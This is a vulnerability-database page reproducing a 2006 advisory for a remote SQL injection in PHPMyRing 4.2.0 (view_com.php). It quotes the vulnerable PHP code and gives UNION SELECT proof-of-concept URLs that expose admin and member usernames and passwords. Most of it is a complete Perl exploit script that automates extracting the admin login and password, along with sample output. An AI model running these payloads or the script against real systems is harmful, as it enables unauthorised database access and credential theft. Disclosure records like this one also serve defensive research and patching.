Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13866
HistoryAug 11, 2006 - 12:00 a.m.

PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection

2006-08-1100:00:00
vulners.com
30
JSON

#######################################################################

PHPMyRing's (view_com.php) Remote SQL injection Exploit

vulnerable code on view_com.php line ( 14 - 24)

[code]

------------------------------------------------------------------------

if (!$idsite)

{

echo "<p align=\"center\">"._("Erreur! Le n° du site n'est pas défini!")."</p>";

}

else

{

// On va aller chercher le nom du site conserné, ça sera fait ;)

// Connexion MySQL

$conn=connecte();

$row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite")); # <== SQL injection

$site_nom=$row['site_nom'];

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml&quot; xml:lang="<? echo _("fr"); ?>">

<head>

<title><? echo _("Commentaires du site"). " ".$site_nom; ?></title>

------------------------------------------------------------------------

---------[/code]

$idsite is not proprelly verified and can be used to inject sql some query

#===========

Exploit :

#===========

http://localhost/webring/view_com.php?idsite=[SQL]

#===========

Exemples :

#===========

[+] the first PoC URL will display admin username in page title and the second admin password

http://localhost/webring/view_com.php?idsite=-1&#37;20UNION&#37;20SELECT&#37;20login

adm%20FROM%20webring_adm

http://localhost/webring/view_com.php?idsite=-1&#37;20UNION&#37;20SELECT&#37;20passa

dm%20FROM%20webring_adm

[+] this will display members username (1) and password(2) in page title

1) http://localhost/webring/view_com.php?idsite=-1&#37;20UNION&#37;20SELECT&#37;20pseud

o%20FROM%20webring%20WHERE%20idsite=[victimesiteid]

2) http://localhost/webring/view_com.php?idsite=-1&#37;20UNION&#37;20SELECT&#37;20mdp&#37;2

0FROM%20webring%20WHERE%20idsite=[victimesiteid]

Exploit to extract both admin login and plain text password:

C:\>perl ring.pl 127.0.0.1 webring

# PHPMyRing's Remote SQL injection Exploit

# Discovered by simo64_at_morx_org

# Script writting by simo_at_morx_org

# MorX Security Research Team

# www.morx.org

[*] Trying to get the admin login …

[+] your admin login is –> admin

[+] your admin pass is –> 123456

use IO::Socket;

if(!defined($ARGV[0] && $ARGV[1])) {

system (clear);

print "\n";

print "#################################################\n";

print "# PHPMyRing's Remote SQL injection Exploit #\n";

print "# Discovered by simo64_at_morx_org #\n";

print "# Script writting by simo_at_morx_org #\n";

print "# MorX Security Research Team #\n";

print "# www.morx.org #\n";

print "#################################################\n\n";

print "— Usage: perl $0 <host> <folder>\n";

print "— Example: perl $0 127.0.0.1 afd_webring\n\n";

exit; }

$TARGET = $ARGV[0];

$FOLDER = $ARGV[1];

$PORT = "80";

$SCRIPT = "/view_com.php?idsite=";

$SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";

$SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";

########################################################################
########

$COMMAND1 = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1";

$COMMAND2 = "Host: $TARGET";

$COMMAND3 = "Connection: Close";

$COMMAND4 = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1";

$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT"
)

|| die "Can't connect to $TARGET";

print "#################################################\n";

print "# PHPMyRing's Remote SQL injection Exploit #\n";

print "# Discovered by simo64_at_morx_org #\n";

print "# Script writting by simo_at_morx_org #\n";

print "# MorX Security Research Team #\n";

print "# www.morx.org #\n";

print "#################################################\n\n";

sleep 2;

print "[*] Trying to get the admin login …\n\n";

print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";

while ($result = <$remote> ) {

if ($result =~ /site (.*?)</ ) {

$adminlogin = $1;

print "[+] your admin login is –> $adminlogin\n\n";

$a = 1;

}

}

if ($a == 0)

{

print "[-] Failed, cant get the admin login\n\n";

print "[*] Trying to get the admin password …\n\n";

}

$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT"
)

|| die "Can't connect to $TARGET";

print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n";

while ($result2 = <$remote> ) {

if ($result2 =~ /site (.*?)</ ) {

$adminpass = $1;

print "[+] your admin pass is –> $adminpass\n\n";

$b = 1;

}

}

if ($b == 0)

{ print "[-] Failed, cant get the admin password\n";

}

$remote->flush();

close($remote);

exit;

JSON